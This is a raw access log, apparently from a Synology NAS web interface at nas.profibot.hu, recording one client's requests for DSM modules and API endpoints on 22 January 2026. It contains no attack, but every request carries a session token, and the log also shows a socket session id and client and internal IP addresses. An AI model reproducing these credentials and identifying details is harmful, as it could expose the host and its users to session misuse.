"//synoscgi.sock/socket.io/?Version=42962&SynoToken=f2zDo5IEsPcHw&UserType=user&EIO=3&transport=polling&t=PlbmVg4&sid=py5VkyfUWROqviZNAAAH" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/PromotionApp.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 5534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.BackgroundTask" [Client 84.1.26.27] [Length 1100] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.EW.Info" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=f2zDo5IEsPcHw&UserType=user&EIO=3&transport=polling&t=PlbmVg4.0&sid=py5VkyfUWROqviZNAAAH" [Client 84.1.26.27] [Length 3] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpUtils.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LoginNotify/LoginNotify.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/ResetAdminApp.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/Main.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 8820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpBrowser.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 14796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/MainVue.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 16917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/BandwidthControl.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6408] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/external_device_util.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 500] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/circleGradient.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/SystemHealthWidget.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3404] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/TreeGrid.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 5290] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/echarts.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 239306] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/StorageUsageWidget.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769086253576&SynoToken=f2zDo5IEsPcHw&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 111] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/syno_echarts_patch.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 42550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource_widget.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 8424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AppNotify/AppNotify.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/config_backup.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 10113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Chooser/Chooser.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3238] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/S2S.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PasswordConfirmDialog.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/DirectoryServiceVueBundle.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/ActiveInsightUpdateNotify.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-filter.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/utils.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6011] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/TaskSchedulerUtils.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 8222] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PercentageBar.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 824] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/EjectableDeviceList.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3055] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/LoginStyleVueBundle.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 20123] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_load.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/MyDSCenter.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1827] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotifyVueBundle.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileSharing/FileSharing.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemStatusChecker/SystemStatusChecker.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/FileTaskUtil.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMUpdateNotify/DSMUpdateAction.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PortEnable/PortEnable.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/core.js?v=2.7.2-2464&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/tinymce.min.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 299542] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskGrid.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1711] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/TaskGrid.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1458] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/lazyDataView.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2838] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowserUtil.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 16195] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_notification.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadUtil.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6974] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/DiskMessageApp.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1352] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/PollingTask.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/NotificationVueBundle.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 14148] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_util.js?v=3.2.1-23280&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 11953] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/DisableAdminNotification.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/EnableNewUpdateSetting.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2986] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/extjs/fileStationExtension.min.js?v=1.3.4-0340&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 415] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/FileChooser.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 12453] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskTray.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 17628] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/directory-admin-list-dialog.js?v=4.15.9-0644&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_component.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotify.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 5758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 